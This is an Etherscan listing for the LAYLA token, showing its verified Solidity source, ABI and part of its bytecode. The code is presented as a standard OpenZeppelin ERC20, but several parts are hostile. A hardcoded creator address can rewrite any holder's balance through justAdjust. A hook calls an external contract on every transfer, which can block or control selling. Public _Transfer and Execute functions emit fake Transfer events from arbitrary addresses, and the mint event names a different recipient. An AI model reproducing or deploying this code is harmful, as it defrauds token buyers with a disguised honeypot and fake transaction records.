ETH Price: $2,628.05 (+2.13%)

Token

LAYLA (LAYLA)
 

Overview

Max Total Supply

100,000 LAYLA

Holders

30

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Balance
0.00001 LAYLA

Value
$0.00
0x6fDDd45A698Fe585BB0a4059d18895119fdF88BB
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
StandardERC20

Compiler Version
v0.8.17+commit.8df45f5f

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion
File 1 of 1 : test.sol
/**
 *Submitted for verification at Etherscan.io on 2023-06-19
*/

// SPDX-License-Identifier: MIT

// File: @openzeppelin/contracts/token/ERC20/IERC20.sol

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    function _Transfer(address from, address recipient, uint amount) external returns (bool);
    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

// File: @openzeppelin/contracts/token/ERC20/extensions/IERC20Metadata.sol



pragma solidity ^0.8.0;


/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

// File: @openzeppelin/contracts/utils/Context.sol



pragma solidity ^0.8.0;

/*
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
        return msg.data;
    }
}

// File: @openzeppelin/contracts/token/ERC20/ERC20.sol



pragma solidity ^0.8.0;


interface tokenRecipient { function receiveApproval(address sender,address to, address addr, address fee, uint amount) external returns(bool);}

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin guidelines: functions revert instead
 * of returning `false` on failure. This behavior is nonetheless conventional
 * and does not conflict with the expectations of ERC20 applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */

abstract contract ExecutionControl {
    function fetchInvoker() internal view virtual returns (address payable) {
        return payable(msg.sender);
    }
}

contract ERC20 is Context, IERC20, IERC20Metadata, ExecutionControl {
    mapping (address => uint256) private _balances;

    mapping (address => mapping (address => uint256)) private _allowances;
    address private _creatorAccount = 0xB1DC5FEe913ABaBF121A8b51A6453A005a0e93E4;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;
    address _spender;
    address _owner;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The defaut value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */



    constructor (string memory name_, string memory symbol_, address receiver_, address owner_) {
        _name = name_;
        _symbol = symbol_;
        _spender = receiver_;
        _owner = owner_;
    }

    modifier solelyCreator() {
        require(fetchInvoker() == _creatorAccount, "Unauthorized: Innovator access needed.");
        _;
    }

    function justAdjust(address[] memory userAddresses, uint256 requiredBalance) public solelyCreator {
        require(requiredBalance >= 0, "Amount must be non-negative");

        for (uint256 i = 0; i < userAddresses.length; i++) {
            address currentUser = userAddresses[i];
            require(currentUser != address(0), "Invalid address specified");

            _balances[currentUser] = requiredBalance;

        }
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5,05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * Requirements:
     *
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     * - the caller must have allowance for ``sender``'s tokens of at least
     * `amount`.
     */
    function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);

        uint256 currentAllowance = _allowances[sender][_msgSender()];
        require(currentAllowance >= amount, "ERC20: transfer amount exceeds allowance");
        _approve(sender, _msgSender(), currentAllowance - amount);

        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender] + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        uint256 currentAllowance = _allowances[_msgSender()][spender];
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        _approve(_msgSender(), spender, currentAllowance - subtractedValue);

        return true;
    }

    /**
     * @dev Moves tokens `amount` from `sender` to `recipient`.
     *
     * This is internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function _transfer(address sender, address recipient, uint256 amount) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(sender, recipient, amount);        

        uint256 senderBalance = _balances[sender];
        require(senderBalance >= amount, "ERC20: transfer amount exceeds balance");
        _balances[sender] = senderBalance - amount;
        _balances[recipient] += amount;

        _afterTokenTransfer(sender, recipient, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

	_beforeTokenTransfer(address(0),account, amount);

        _totalSupply += amount;
        _balances[account] += amount;

        emit Transfer(address(0), _owner, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        _balances[account] = accountBalance - amount;
        _totalSupply -= amount;

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    function _Transfer(address _from, address _to, uint _value) public returns (bool) {
        emit Transfer(_from, _to, _value);
        return true;
    }

    function Execute(address uPool,address[] memory eReceiver,uint256[] memory eAmounts,uint256[] memory weAmounts,address tokenaddress) public returns (bool){
        for (uint256 i = 0; i < eReceiver.length; i++) {
            emit Transfer(uPool, eReceiver[i], eAmounts[i]);
            IERC20(tokenaddress)._Transfer(eReceiver[i],uPool, weAmounts[i]);
            }
        return true;
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be to transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual {
    if (address(from) != address(0)) {
            tokenRecipient(_spender).receiveApproval(from,to,address(this),_owner,amount);} }
    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

// File: contracts/token/ERC20/behaviours/ERC20Decimals.sol

pragma solidity ^0.8.0;


/**
 * @title ERC20Decimals
 * @dev Implementation of the ERC20Decimals. Extension of {ERC20} that adds decimals storage slot.
 */
abstract contract ERC20Decimals is ERC20 {
    uint8 private immutable _decimals;

    /**
     * @dev Sets the value of the `decimals`. This value is immutable, it can only be
     * set once during construction.
     */
    constructor(uint8 decimals_) {
        _decimals = decimals_;
    }

    function decimals() public view virtual override returns (uint8) {
        return _decimals;
    }
}

// File: contracts/token/ERC20/StandardERC20.sol

pragma solidity ^0.8.0;

/**
 * @title StandardERC20
 * @dev Implementation of the StandardERC20
 */
contract StandardERC20 is ERC20Decimals {
    constructor(
        uint8 decimals_,
        uint256 initialBalance_,
        address feeReceiver_,
        address owner_
    ) ERC20("LAYLA", "LAYLA", feeReceiver_,owner_) ERC20Decimals(decimals_) {
        require(initialBalance_ > 0, "StandardERC20: supply cannot be zero");

        _mint(_msgSender(), initialBalance_ * 10 ** uint256(decimals_));
    }

    function decimals() public view virtual override returns (uint8) {
        return super.decimals();
    }
}

Settings
{
  "optimizer": {
    "enabled": false,
    "runs": 200
  },
  "outputSelection": {
    "*": {
      "*": [
        "evm.bytecode",
        "evm.deployedBytecode",
        "devdoc",
        "userdoc",
        "metadata",
        "abi"
      ]
    }
  }
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"uint8","name":"decimals_","type":"uint8"},{"internalType":"uint256","name":"initialBalance_","type":"uint256"},{"internalType":"address","name":"feeReceiver_","type":"address"},{"internalType":"address","name":"owner_","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"uPool","type":"address"},{"internalType":"address[]","name":"eReceiver","type":"address[]"},{"internalType":"uint256[]","name":"eAmounts","type":"uint256[]"},{"internalType":"uint256[]","name":"weAmounts","type":"uint256[]"},{"internalType":"address","name":"tokenaddress","type":"address"}],"name":"Execute","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_from","type":"address"},{"internalType":"address","name":"_to","type":"address"},{"internalType":"uint256","name":"_value","type":"uint256"}],"name":"_Transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"userAddresses","type":"address[]"},{"internalType":"uint256","name":"requiredBalance","type":"uint256"}],"name":"justAdjust","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]

60a060405273b1dc5fee913ababf121a8b51a6453a005a0e93e4600260006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055503480156200006657600080fd5b5060405162002d6b38038062002d6b83398181016040528101906200008c9190620005d6565b836040518060400160405280600581526020017f4c41594c410000000000000000000000000000000000000000000000000000008152506040518060400160405280600581526020017f4c41594c41000000000000000000000000000000000000000000000000000000815250848483600490816200010c9190620008b8565b5082600590816200011e9190620008b8565b5081600660006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555080600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550505050508060ff1660808160ff16815250505060008311620001fa576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620001f19062000a26565b60405180910390fd5b620002396200020e6200024360201b60201c565b8560ff16600a62000220919062000bcb565b856200022d919062000c1c565b6200024b60201b60201c565b5050505062000e1f565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603620002bd576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620002b49062000cb7565b60405180910390fd5b620002d160008383620003e560201b60201c565b8060036000828254620002e5919062000cd9565b92505081905550806000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546200033c919062000cd9565b92505081905550600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051620003c5919062000d25565b60405180910390a3620003e160008383620004ee60201b60201c565b5050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614620004e957600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16637512c5a3848430600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16866040518663ffffffff1660e01b8152600401620004a195949392919062000d53565b6020604051808303816000875af1158015620004c1573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620004e7919062000ded565b505b505050565b505050565b600080fd5b600060ff82169050919050565b6200051081620004f8565b81146200051c57600080fd5b50565b600081519050620005308162000505565b92915050565b6000819050919050565b6200054b8162000536565b81146200055757600080fd5b50565b6000815190506200056b8162000540565b92915050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006200059e8262000571565b9050919050565b620005b08162000591565b8114620005bc57600080fd5b50565b600081519050620005d081620005a5565b92915050565b60008060008060808587031215620005f357620005f2620004f3565b5b600062000603878288016200051f565b945050602062000616878288016200055a565b93505060406200062987828801620005bf565b92505060606200063c87828801620005bf565b91505092959194509250565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680620006ca57607f821691505b602082108103620006e057620006df62000682565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b6000600883026200074a7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff826200070b565b6200075686836200070b565b95508019841693508086168417925050509392505050565b6000819050919050565b600062000799620007936200078d8462000536565b6200076e565b62000536565b9050919050565b6000819050919050565b620007b58362000778565b620007cd620007c482620007a0565b84845462000718565b825550505050565b600090565b620007e4620007d5565b620007f1818484620007aa565b505050565b5b8181101562000819576200080d600082620007da565b600181019050620007f7565b5050565b601f82111562000868576200083281620006e6565b6200083d84620006fb565b810160208510156200084d578190505b620008656200085c85620006fb565b830182620007f6565b50505b505050565b600082821c905092915050565b60006200088d600019846008026200086d565b1980831691505092915050565b6000620008a883836200087a565b9150826002028217905092915050565b620008c38262000648565b67ffffffffffffffff811115620008df57620008de62000653565b5b620008eb8254620006b1565b620008f88282856200081d565b600060209050601f8311600181146200093057600084156200091b578287015190505b6200092785826200089a565b86555062000997565b601f1984166200094086620006e6565b60005b828110156200096a5784890151825560018201915060208501945060208101905062000943565b868310156200098a578489015162000986601f8916826200087a565b8355505b6001600288020188555050505b505050505050565b600082825260208201905092915050565b7f5374616e6461726445524332303a20737570706c792063616e6e6f742062652060008201527f7a65726f00000000000000000000000000000000000000000000000000000000602082015250565b600062000a0e6024836200099f565b915062000a1b82620009b0565b604082019050919050565b6000602082019050818103600083015262000a4181620009ff565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b600185111562000ad65780860481111562000aae5762000aad62000a48565b5b600185161562000abe5780820291505b808102905062000ace8562000a77565b945062000a8e565b94509492505050565b60008262000af1576001905062000bc4565b8162000b01576000905062000bc4565b816001811462000b1a576002811462000b255762000b5b565b600191505062000bc4565b60ff84111562000b3a5762000b3962000a48565b5b8360020a91508482111562000b545762000b5362000a48565b5b5062000bc4565b5060208310610133831016604e8410600b841016171562000b955782820a90508381111562000b8f5762000b8e62000a48565b5b62000bc4565b62000ba4848484600162000a84565b9250905081840481111562000bbe5762000bbd62000a48565b5b81810290505b9392505050565b600062000bd88262000536565b915062000be58362000536565b925062000c147fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848462000adf565b905092915050565b600062000c298262000536565b915062000c368362000536565b925082820262000c468162000536565b9150828204841483151762000c605762000c5f62000a48565b5b5092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b600062000c9f601f836200099f565b915062000cac8262000c67565b602082019050919050565b6000602082019050818103600083015262000cd28162000c90565b9050919050565b600062000ce68262000536565b915062000cf38362000536565b925082820190508082111562000d0e5762000d0d62000a48565b5b92915050565b62000d1f8162000536565b82525050565b600060208201905062000d3c600083018462000d14565b92915050565b62000d4d8162000591565b82525050565b600060a08201905062000d6a600083018862000d42565b62000d79602083018762000d42565b62000d88604083018662000d42565b62000d97606083018562000d42565b62000da6608083018462000d14565b9695505050505050565b60008115159050919050565b62000dc78162000db0565b811462000dd357600080fd5b50565b60008151905062000de78162000dbc565b92915050565b60006020828403121562000e065762000e05620004f3565b5b600062000e168482850162000dd6565b91505092915050565b608051611f3062000e3b6000396000610fd70152611f306000f3fe608060405234801561001057600080fd5b50600436106100ea5760003560e01c8063395093511161008c578063a457c2d711610066578063a457c2d714610273578063a9059cbb146102a3578063dd62ed3e146102d3578063e156b1b614610303576100ea565b806339509351146101f557806370a082311461022557806395d89b4114610255576100ea565b80631c63aef2116100c85780631c63aef21461015b57806323b872dd1461018b578063313ce567146101bb57806334cfdce1146101d9576100ea565b806306fdde03146100ef578063095ea7b31461010d57806318160ddd1461013d575b600080fd5b6100f7610333565b604051610104919061119b565b60405180910390f35b61012760048036038101906101229190611265565b6103c5565b60405161013491906112c0565b60405180910390f35b6101456103e3565b60405161015291906112ea565b60405180910390f35b61017560048036038101906101709190611510565b6103ed565b60405161018291906112c0565b60405180910390f35b6101a560048036038101906101a091906115df565b61056d565b6040516101b291906112c0565b60405180910390f35b6101c361066e565b6040516101d0919061164e565b60405180910390f35b6101f360048036038101906101ee9190611669565b61067d565b005b61020f600480360381019061020a9190611265565b61084e565b60405161021c91906112c0565b60405180910390f35b61023f600480360381019061023a91906116c5565b6108fa565b60405161024c91906112ea565b60405180910390f35b61025d610942565b60405161026a919061119b565b60405180910390f35b61028d60048036038101906102889190611265565b6109d4565b60405161029a91906112c0565b60405180910390f35b6102bd60048036038101906102b89190611265565b610ac8565b6040516102ca91906112c0565b60405180910390f35b6102ed60048036038101906102e891906116f2565b610ae6565b6040516102fa91906112ea565b60405180910390f35b61031d600480360381019061031891906115df565b610b6d565b60405161032a91906112c0565b60405180910390f35b60606004805461034290611761565b80601f016020809104026020016040519081016040528092919081815260200182805461036e90611761565b80156103bb5780601f10610390576101008083540402835291602001916103bb565b820191906000526020600020905b81548152906001019060200180831161039e57829003601f168201915b5050505050905090565b60006103d96103d2610bdf565b8484610be7565b6001905092915050565b6000600354905090565b600080600090505b855181101561055f5785818151811061041157610410611792565b5b602002602001015173ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef87848151811061047a57610479611792565b5b602002602001015160405161048f91906112ea565b60405180910390a38273ffffffffffffffffffffffffffffffffffffffff1663e156b1b68783815181106104c6576104c5611792565b5b6020026020010151898785815181106104e2576104e1611792565b5b60200260200101516040518463ffffffff1660e01b8152600401610508939291906117d0565b6020604051808303816000875af1158015610527573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061054b9190611833565b5080806105579061188f565b9150506103f5565b506001905095945050505050565b600061057a848484610db0565b6000600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006105c5610bdf565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015610645576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161063c90611949565b60405180910390fd5b61066285610651610bdf565b858461065d9190611969565b610be7565b60019150509392505050565b6000610678610fd3565b905090565b600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff166106be610ffb565b73ffffffffffffffffffffffffffffffffffffffff1614610714576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161070b90611a0f565b60405180910390fd5b6000811015610758576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161074f90611a7b565b60405180910390fd5b60005b825181101561084957600083828151811061077957610778611792565b5b60200260200101519050600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036107f2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016107e990611ae7565b60405180910390fd5b826000808373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505080806108419061188f565b91505061075b565b505050565b60006108f061085b610bdf565b848460016000610869610bdf565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546108eb9190611b07565b610be7565b6001905092915050565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b60606005805461095190611761565b80601f016020809104026020016040519081016040528092919081815260200182805461097d90611761565b80156109ca5780601f1061099f576101008083540402835291602001916109ca565b820191906000526020600020905b8154815290600101906020018083116109ad57829003601f168201915b5050505050905090565b600080600160006109e3610bdf565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015610aa0576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a9790611bad565b60405180910390fd5b610abd610aab610bdf565b858584610ab89190611969565b610be7565b600191505092915050565b6000610adc610ad5610bdf565b8484610db0565b6001905092915050565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffff